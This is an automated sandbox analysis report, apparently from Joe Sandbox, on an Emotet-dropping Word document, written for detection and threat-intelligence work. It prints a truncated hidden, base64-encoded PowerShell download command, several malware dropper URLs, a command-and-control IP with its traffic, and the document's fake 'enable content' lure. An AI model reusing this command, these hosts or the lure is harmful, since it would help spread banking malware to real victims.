13.2.rundll32.exe.1b0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.200000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.200000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.210000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.220000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.210000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.250000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.240000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.230000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 22 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArA

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://veterinariadrpopui.com	Avira URL Cloud: Label: malware
Source: http://veterinariadrpopui.com/content/5f18Q/	Avira URL Cloud: Label: malware
Source: http://sofsuite.com/wp-includes/2jm3nIk/	Avira URL Cloud: Label: phishing
Source: http://khanhhoahomnay.net/wordpress/CGMC/	Avira URL Cloud: Label: malware
Source: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/	Avira URL Cloud: Label: malware
Source: http://shop.elemenslide.com/wp-content/n/	Avira URL Cloud: Label: malware
Source: http://wpsapk.com/wp-admin/v/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: dat_513543.doc

Virustotal: Detection: 63%

Perma Link

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,	7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,	7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,	7_2_10002730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_002B75AE CryptDecodeObjectEx,	15_2_002B75AE

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp
Source:	Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2105242843.0000000002AD0000.00000002.00000001.sdmp
Source:	Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_002B109C FindFirstFileW,

15_2_002B109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: global traffic

DNS query: name: wpsapk.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80

Networking:

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in memory: http://veterinariadrpopui.com/content/5f18Q/
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/

Source: global traffic	HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 209.59.139.39 209.59.139.39
Source: Joe Sandbox View	IP Address: 5.2.136.90 5.2.136.90

Source: Joe Sandbox View	ASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic

HTTP traffic detected: POST /04rd/6w3hm75k6ju730vl/l0qiyvbr6/vmtc1/bd9090pvenbvbzuu/ HTTP/1.1DNT: 0Referer: 5.2.136.90/04rd/6w3hm75k6ju730vl/l0qiyvbr6/vmtc1/bd9090pvenbvbzuu/Content-Type: multipart/form-data; boundary=--------rL4XtnE8User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 7412Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_002C023A InternetReadFile,

15_2_002C023A

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{51D7E52E-FC7D-43F0-B5EC-EA333295AFA3}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2110632977.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105139354.0000000001CE0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106445061.0000000001E70000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: wpsapk.com

Source: unknown

Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: rundll32.exe, 00000006.00000002.2110632977.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105139354.0000000001CE0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106445061.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2110632977.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105139354.0000000001CE0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106445061.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2113413103.0000000003BC8000.00000004.00000001.sdmp	String found in binary or memory: http://khanhhoahomnay.net
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: rundll32.exe, 00000006.00000002.2111721751.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105906260.0000000001EC7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2107059819.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2111721751.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105906260.0000000001EC7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2107059819.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2103756353.0000000002430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107759466.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109125954.0000000002800000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2111721751.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105906260.0000000001EC7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2107059819.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2113413103.0000000003BC8000.00000004.00000001.sdmp	String found in binary or memory: http://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in binary or memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2112121116.0000000003B43000.00000004.00000001.sdmp	String found in binary or memory: http://sofsuite.com
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2112702616.0000000003B8D000.00000004.00000001.sdmp	String found in binary or memory: http://veterinariadrpopui.com
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
Source: rundll32.exe, 00000006.00000002.2111721751.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105906260.0000000001EC7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2107059819.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in binary or memory: http://wpsapk.com
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in binary or memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2103756353.0000000002430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107759466.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109125954.0000000002800000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2110632977.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105139354.0000000001CE0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106445061.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2111721751.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105906260.0000000001EC7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2107059819.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2110632977.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105139354.0000000001CE0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106445061.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2102201796.0000000000404000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2102201796.0000000000404000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.c
Source: rundll32.exe, 00000009.00000002.2108646901.00000000022B0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	String found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
Source: powershell.exe, 00000005.00000002.2112111732.0000000003B2E000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2112702616.0000000003B8D000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000C.00000002.2111593595.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2113623618.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2108402593.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2104218731.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2115470379.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2109758118.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2107419696.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2345304717.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2105708709.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 15.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , word
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , words:3 i C i N@m 13 ;a 1
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K O a S
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K O a S
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: dat_513543.doc	OLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
Source: dat_513543.doc	OLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
Source: dat_513543.doc	OLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
